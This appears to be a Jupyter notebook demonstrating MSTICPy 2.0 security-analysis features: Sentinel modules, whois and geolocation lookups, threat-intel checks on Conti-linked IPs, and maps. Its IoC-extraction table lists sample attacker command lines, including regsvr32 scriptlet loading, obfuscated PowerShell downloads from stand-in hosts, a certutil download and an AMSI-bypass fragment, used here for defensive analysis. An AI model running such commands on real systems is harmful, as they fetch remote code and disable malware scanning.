{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# What's new in MSTICPy 2.0?\n", "\n", "- Project reorganization\n", "- Import simplification:\n", " - mp.attributes\n", " - init_notebook imports - Entities & Pivots\n", " - pandas accessors\n", "- Time Series pandas accessors\n", "- Threat Intel Lookup Async\n", "- DataFrame to Graph\n", "- Folium map\n", "- Sentinel Workspace configuration\n", "- Pivoting and Data Providers\n", "\n", "\n", "## V2.0.0 Docs available online\n", "https://msticpy.readthedocs.io/en/release-msticpy-v2.0.0/" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Imports simplified\n", "\n", "New \"house style\" - shortening msticpy to \"mp\"\n" ] }, { "cell_type": "code", "execution_count": 86, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "True" ] }, "execution_count": 86, "metadata": {}, "output_type": "execute_result" } ], "source": [ "import msticpy as mp\n", "\n", "mp.init_notebook()" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Many classes and functions are available directly from \"mp\"" ] }, { "cell_type": "code", "execution_count": 89, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n", "msticpy version installed: 2.0.0rc2 latest published: 1.8.2\n", "Latest version is installed.\n" ] }, { "data": { "text/html": [ "\n", " \n", "
Module | Help |
---|---|
msticpy.datamodel.soc.sentinel_alert | msticpy.datamodel.soc.sentinel_alert |
msticpy.context.azure.sentinel_utils | msticpy.context.azure.sentinel_utils |
msticpy.config.ce_azure_sentinel | msticpy.config.ce_azure_sentinel |
msticpy.context.azure.sentinel_incidents | msticpy.context.azure.sentinel_incidents |
msticpy.context.azure.sentinel_watchlists | msticpy.context.azure.sentinel_watchlists |
msticpy.context.azure.sentinel_core | msticpy.context.azure.sentinel_core |
msticpy.context.azure.sentinel_bookmarks | msticpy.context.azure.sentinel_bookmarks |
msticpy.context.azure.sentinel_workspaces | msticpy.context.azure.sentinel_workspaces |
msticpy.context.azure.sentinel_analytics | msticpy.context.azure.sentinel_analytics |
msticpy.context.azure.sentinel_search | msticpy.context.azure.sentinel_search |
\n", " | asn | \n", "asn_cidr | \n", "asn_country_code | \n", "asn_date | \n", "asn_description | \n", "asn_registry | \n", "nets | \n", "nir | \n", "query | \n", "raw | \n", "raw_referral | \n", "referral | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "1103 | \n", "145.1.0.0/17 | \n", "NL | \n", "1993-09-01 | \n", "SURFNET-NL SURFnet, The Netherlands, NL | \n", "ripencc | \n", "[{'cidr': '145.1.0.0/17', 'name': 'NIOZ-NET', 'handle': 'WP1948-RIPE', 'range': '145.1.0.0 - 145... | \n", "None | \n", "145.1.10.17 | \n", "None | \n", "None | \n", "None | \n", "
\n", " | CountryCode | \n", "CountryName | \n", "Longitude | \n", "Latitude | \n", "TimeGenerated | \n", "Type | \n", "IpAddress | \n", "
---|---|---|---|---|---|---|---|
0 | \n", "NL | \n", "Netherlands | \n", "4.8995 | \n", "52.3824 | \n", "2022-06-14 16:25:09.670081 | \n", "geolocation | \n", "145.1.10.17 | \n", "
\n", " | TenantId | \n", "Account | \n", "EventID | \n", "TimeGenerated | \n", "Computer | \n", "SubjectUserSid | \n", "SubjectUserName | \n", "SubjectDomainName | \n", "SubjectLogonId | \n", "NewProcessId | \n", "NewProcessName | \n", "TokenElevationType | \n", "ProcessId | \n", "CommandLine | \n", "ParentProcessName | \n", "TargetLogonId | \n", "SourceComputerId | \n", "TimeCreatedUtc | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "WORKGROUP\\MSTICAlertsWin1$ | \n", "4688 | \n", "2019-01-15 05:24:24.010 | \n", "MSTICAlertsWin1 | \n", "S-1-5-18 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "0x3e7 | \n", "0x1610 | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De... | \n", "%%1936 | \n", "0x888 | \n", "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\D... | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe | \n", "0x0 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "2019-01-15 05:24:24.010 | \n", "
1 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "WORKGROUP\\MSTICAlertsWin1$ | \n", "4688 | \n", "2019-01-15 05:24:24.023 | \n", "MSTICAlertsWin1 | \n", "S-1-5-18 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "0x3e7 | \n", "0x1790 | \n", "C:\\Windows\\System32\\conhost.exe | \n", "%%1936 | \n", "0x1610 | \n", "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1 | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De... | \n", "0x0 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "2019-01-15 05:24:24.023 | \n", "
2 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "WORKGROUP\\MSTICAlertsWin1$ | \n", "4688 | \n", "2019-01-15 05:24:25.807 | \n", "MSTICAlertsWin1 | \n", "S-1-5-18 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "0x3e7 | \n", "0xcd8 | \n", "C:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe | \n", "%%1936 | \n", "0x280 | \n", "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding | \n", "C:\\Windows\\System32\\svchost.exe | \n", "0x3e4 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "2019-01-15 05:24:25.807 | \n", "
\n", " | IoCType | \n", "Observable | \n", "SourceIndex | \n", "Input | \n", "
---|---|---|---|---|
0 | \n", "url | \n", "http://server/file.sct | \n", "94 | \n", ".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | \n", "
1 | \n", "dns | \n", "server | \n", "94 | \n", ".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | \n", "
2 | \n", "url | \n", "https://blah/png','google.png')} | \n", "104 | \n", ".\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... | \n", "
3 | \n", "dns | \n", "blah | \n", "104 | \n", ".\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... | \n", "
4 | \n", "url | \n", "http://somedomain/best-kitten-names-1.jpg' | \n", "110 | \n", "cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | \n", "
5 | \n", "dns | \n", "somedomain | \n", "110 | \n", "cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | \n", "
6 | \n", "url | \n", "http://badguyserver/pwnme | \n", "125 | \n", "cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" | \n", "
7 | \n", "dns | \n", "badguyserver | \n", "125 | \n", "cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" | \n", "
8 | \n", "url | \n", "http://badguyserver/pwnme | \n", "130 | \n", ".\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... | \n", "
9 | \n", "dns | \n", "badguyserver | \n", "130 | \n", ".\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... | \n", "
10 | \n", "url | \n", "http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | \n", "174 | \n", ".\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... | \n", "
11 | \n", "dns | \n", "system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | \n", "174 | \n", ".\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... | \n", "
12 | \n", "ipv4 | \n", "1.2.3.4 | \n", "175 | \n", "netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\b... | \n", "
13 | \n", "ipv4 | \n", "127.0.0.1 | \n", "214 | \n", "certutil -urlcache -split -f http://127.0.0.1/ | \n", "
14 | \n", "url | \n", "http://127.0.0.1/ | \n", "214 | \n", "certutil -urlcache -split -f http://127.0.0.1/ | \n", "
\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\n", " | Ioc | \n", "IocType | \n", "SanitizedValue | \n", "QuerySubtype | \n", "Provider | \n", "Result | \n", "Severity | \n", "Details | \n", "RawResult | \n", "Reference | \n", "Status | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "162.244.80.235 | \n", "ipv4 | \n", "162.244.80.235 | \n", "None | \n", "OTX | \n", "True | \n", "high | \n", "{'pulse_count': 45, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | \n", "{'whois': 'http://whois.domaintools.com/162.244.80.235', 'reputation': 0, 'indicator': '162.244.... | \n", "https://otx.alienvault.com/api/v1/indicators/IPv4/162.244.80.235/general | \n", "0 | \n", "
1 | \n", "185.141.63.120 | \n", "ipv4 | \n", "185.141.63.120 | \n", "None | \n", "OTX | \n", "True | \n", "high | \n", "{'pulse_count': 35, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | \n", "{'whois': 'http://whois.domaintools.com/185.141.63.120', 'reputation': 0, 'indicator': '185.141.... | \n", "https://otx.alienvault.com/api/v1/indicators/IPv4/185.141.63.120/general | \n", "0 | \n", "
2 | \n", "82.118.21.1 | \n", "ipv4 | \n", "82.118.21.1 | \n", "None | \n", "OTX | \n", "True | \n", "high | \n", "{'pulse_count': 36, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | \n", "{'whois': 'http://whois.domaintools.com/82.118.21.1', 'reputation': 0, 'indicator': '82.118.21.1... | \n", "https://otx.alienvault.com/api/v1/indicators/IPv4/82.118.21.1/general | \n", "0 | \n", "
3 | \n", "85.93.88.165 | \n", "ipv4 | \n", "85.93.88.165 | \n", "None | \n", "OTX | \n", "True | \n", "high | \n", "{'pulse_count': 22, 'names': ['MS-ISAC: Joint Cybersecurity Advisory: Conti Ransomware', 'Conti ... | \n", "{'whois': 'http://whois.domaintools.com/85.93.88.165', 'reputation': 0, 'indicator': '85.93.88.1... | \n", "https://otx.alienvault.com/api/v1/indicators/IPv4/85.93.88.165/general | \n", "0 | \n", "
0 | \n", "162.244.80.235 | \n", "ipv4 | \n", "162.244.80.235 | \n", "None | \n", "RiskIQ | \n", "True | \n", "high | \n", "{'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article... | \n", "{'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article... | \n", "https://community.riskiq.com | \n", "0 | \n", "
1 | \n", "185.141.63.120 | \n", "ipv4 | \n", "185.141.63.120 | \n", "None | \n", "RiskIQ | \n", "True | \n", "high | \n", "{'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'... | \n", "{'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'... | \n", "https://community.riskiq.com | \n", "0 | \n", "
2 | \n", "82.118.21.1 | \n", "ipv4 | \n", "82.118.21.1 | \n", "None | \n", "RiskIQ | \n", "True | \n", "high | \n", "{'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article... | \n", "{'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article... | \n", "https://community.riskiq.com | \n", "0 | \n", "
3 | \n", "85.93.88.165 | \n", "ipv4 | \n", "85.93.88.165 | \n", "None | \n", "RiskIQ | \n", "True | \n", "high | \n", "{'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article... | \n", "{'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article... | \n", "https://community.riskiq.com | \n", "0 | \n", "
0 | \n", "162.244.80.235 | \n", "ipv4 | \n", "162.244.80.235 | \n", "None | \n", "Tor | \n", "True | \n", "information | \n", "Not found. | \n", "None | \n", "https://check.torproject.org/exit-addresses | \n", "0 | \n", "
1 | \n", "185.141.63.120 | \n", "ipv4 | \n", "185.141.63.120 | \n", "None | \n", "Tor | \n", "True | \n", "information | \n", "Not found. | \n", "None | \n", "https://check.torproject.org/exit-addresses | \n", "0 | \n", "
2 | \n", "82.118.21.1 | \n", "ipv4 | \n", "82.118.21.1 | \n", "None | \n", "Tor | \n", "True | \n", "information | \n", "Not found. | \n", "None | \n", "https://check.torproject.org/exit-addresses | \n", "0 | \n", "
3 | \n", "85.93.88.165 | \n", "ipv4 | \n", "85.93.88.165 | \n", "None | \n", "Tor | \n", "True | \n", "information | \n", "Not found. | \n", "None | \n", "https://check.torproject.org/exit-addresses | \n", "0 | \n", "
0 | \n", "162.244.80.235 | \n", "ipv4 | \n", "162.244.80.235 | \n", "None | \n", "VirusTotal | \n", "True | \n", "high | \n", "{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 35, 'detected_urls': [... | \n", "{'asn': 19624, 'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-03 16:53... | \n", "https://www.virustotal.com/vtapi/v2/ip-address/report | \n", "0 | \n", "
1 | \n", "185.141.63.120 | \n", "ipv4 | \n", "185.141.63.120 | \n", "None | \n", "VirusTotal | \n", "True | \n", "high | \n", "{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 19, 'detected_urls': [... | \n", "{'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-05 03:45:47', 'positiv... | \n", "https://www.virustotal.com/vtapi/v2/ip-address/report | \n", "0 | \n", "
2 | \n", "82.118.21.1 | \n", "ipv4 | \n", "82.118.21.1 | \n", "None | \n", "VirusTotal | \n", "True | \n", "high | \n", "{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 42, 'detected_urls': [... | \n", "{'asn': 204957, 'undetected_urls': [['http://bkgs0007.nov.com/', 'fe9ad6fcfd8214a3898853b5dec208... | \n", "https://www.virustotal.com/vtapi/v2/ip-address/report | \n", "0 | \n", "
3 | \n", "85.93.88.165 | \n", "ipv4 | \n", "85.93.88.165 | \n", "None | \n", "VirusTotal | \n", "True | \n", "high | \n", "{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 7, 'detected_urls': ['... | \n", "{'asn': 8972, 'undetected_urls': [['https://bbb.edu-cisco.org/', '6adc598e2c5362b5f5facad921d0f0... | \n", "https://www.virustotal.com/vtapi/v2/ip-address/report | \n", "0 | \n", "
0 | \n", "162.244.80.235 | \n", "ipv4 | \n", "162.244.80.235 | \n", "None | \n", "XForce | \n", "False | \n", "information | \n", "Authorization failed. Check account and key details. | \n", "<Response [401 Unauthorized]> | \n", "https://api.xforce.ibmcloud.com/ipr/162.244.80.235 | \n", "401 | \n", "
1 | \n", "185.141.63.120 | \n", "ipv4 | \n", "185.141.63.120 | \n", "None | \n", "XForce | \n", "False | \n", "information | \n", "Authorization failed. Check account and key details. | \n", "<Response [401 Unauthorized]> | \n", "https://api.xforce.ibmcloud.com/ipr/185.141.63.120 | \n", "401 | \n", "
2 | \n", "82.118.21.1 | \n", "ipv4 | \n", "82.118.21.1 | \n", "None | \n", "XForce | \n", "False | \n", "information | \n", "Authorization failed. Check account and key details. | \n", "<Response [401 Unauthorized]> | \n", "https://api.xforce.ibmcloud.com/ipr/82.118.21.1 | \n", "401 | \n", "
3 | \n", "85.93.88.165 | \n", "ipv4 | \n", "85.93.88.165 | \n", "None | \n", "XForce | \n", "False | \n", "information | \n", "Authorization failed. Check account and key details. | \n", "<Response [401 Unauthorized]> | \n", "https://api.xforce.ibmcloud.com/ipr/85.93.88.165 | \n", "401 | \n", "
\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\n", " | AllExtIPs | \n", "CountryCode | \n", "CountryName | \n", "State | \n", "City | \n", "Longitude | \n", "Latitude | \n", "Asn | \n", "edges | \n", "Type | \n", "AdditionalData | \n", "IpAddress | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "65.55.44.109 | \n", "US | \n", "United States | \n", "Virginia | \n", "Boydton | \n", "-78.3750 | \n", "36.6534 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "65.55.44.109 | \n", "
1 | \n", "13.71.172.128 | \n", "CA | \n", "Canada | \n", "Ontario | \n", "Toronto | \n", "-79.4195 | \n", "43.6644 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "13.71.172.128 | \n", "
2 | \n", "13.71.172.130 | \n", "CA | \n", "Canada | \n", "Ontario | \n", "Toronto | \n", "-79.4195 | \n", "43.6644 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "13.71.172.130 | \n", "
3 | \n", "40.124.45.19 | \n", "US | \n", "United States | \n", "Texas | \n", "San Antonio | \n", "-98.4926 | \n", "29.4221 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "40.124.45.19 | \n", "
4 | \n", "104.43.212.12 | \n", "US | \n", "United States | \n", "Iowa | \n", "Des Moines | \n", "-93.6127 | \n", "41.6015 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "104.43.212.12 | \n", "
\n", " | AllExtIPs | \n", "CountryCode | \n", "CountryName | \n", "State | \n", "City | \n", "Longitude | \n", "Latitude | \n", "Asn | \n", "edges | \n", "Type | \n", "AdditionalData | \n", "IpAddress | \n", "Status | \n", "Friendliness | \n", "Flavor | \n", "SpiceLevel | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "65.55.44.109 | \n", "US | \n", "United States | \n", "Virginia | \n", "Boydton | \n", "-78.3750 | \n", "36.6534 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "65.55.44.109 | \n", "Home | \n", "Warm | \n", "Chocolate | \n", "1.0 | \n", "
1 | \n", "13.71.172.128 | \n", "CA | \n", "Canada | \n", "Ontario | \n", "Toronto | \n", "-79.4195 | \n", "43.6644 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "13.71.172.128 | \n", "Office | \n", "Cold | \n", "Cinnamon | \n", "2.0 | \n", "
2 | \n", "13.71.172.130 | \n", "CA | \n", "Canada | \n", "Ontario | \n", "Toronto | \n", "-79.4195 | \n", "43.6644 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "13.71.172.130 | \n", "Vacation | \n", "Medium | \n", "Mango | \n", "3.0 | \n", "